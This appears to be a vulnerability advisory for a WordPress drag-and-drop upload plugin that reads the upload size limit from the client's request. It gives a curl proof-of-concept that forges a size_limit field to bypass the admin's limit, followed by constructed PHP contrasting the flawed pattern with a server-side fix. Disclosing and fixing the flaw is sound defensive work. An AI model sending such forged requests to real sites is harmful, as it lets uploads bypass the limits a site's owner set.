The plugin does not enforce the upload size limit configured in forms on the server side; instead, it takes the limit from user input sent when the form is submitted. As a result, attackers could control the file size limit and bypass the limit set by admins in the contact form.
curl -X POST -F "size_limit=10485760" -F "action=dnd_codedropz_upload" -F "type=click" -F "form_id=156" -F "upload_name=upload-file-235" -F "[email protected]" https://example.com/wordpress/wp-admin/admin-ajax.php
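The flaw described above, shown next to a server-side fix, as an added example that is not the plugin's own code. The function names and the `ADMIN_LIMITS` table are hypothetical stand-ins for wherever the admin's per-form limit is stored; only the request field names come from the request shown above.

```php
<?php
// Constructed stand-in for the limits an admin saved with each form
// (form id => upload field name => max bytes). Hypothetical storage.
const ADMIN_LIMITS = [
    156 => ['upload-file-235' => 1048576], // 1 MiB, constructed value
];

// Flawed pattern: the limit is read from the request the client controls.
function limit_from_request(array $post): ?int
{
    return isset($post['size_limit']) ? (int) $post['size_limit'] : null;
}

// Hardened pattern: the limit is looked up server-side from the form
// configuration; any size_limit field in the request is ignored.
function limit_from_config(array $post): ?int
{
    $formId = filter_var($post['form_id'] ?? null, FILTER_VALIDATE_INT);
    if ($formId === false) {
        return null; // missing or non-numeric form id
    }
    $field  = (string) ($post['upload_name'] ?? '');
    $limits = ADMIN_LIMITS;
    return $limits[$formId][$field] ?? null; // unknown form or field
}

// Size check that fails closed when no valid limit can be resolved.
function accept_upload(array $post, int $fileBytes, callable $limitSource): bool
{
    $limit = $limitSource($post);
    if ($limit === null || $limit <= 0) {
        return false;
    }
    return $fileBytes <= $limit;
}

// Constructed request reusing the field names from the request above.
$post = [
    'size_limit'  => '10485760',
    'form_id'     => '156',
    'upload_name' => 'upload-file-235',
];
$fileBytes = 5 * 1024 * 1024; // 5 MiB file, above the configured 1 MiB

var_dump(accept_upload($post, $fileBytes, 'limit_from_request'));
var_dump(accept_upload($post, $fileBytes, 'limit_from_config'));
```

The first call accepts the 5 MiB file because the request supplied its own 10 MiB limit; the second rejects it because the limit comes from the stored form configuration.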
BYPASS
Sanjay Das
Yes
2022-09-26 (about 8 months ago)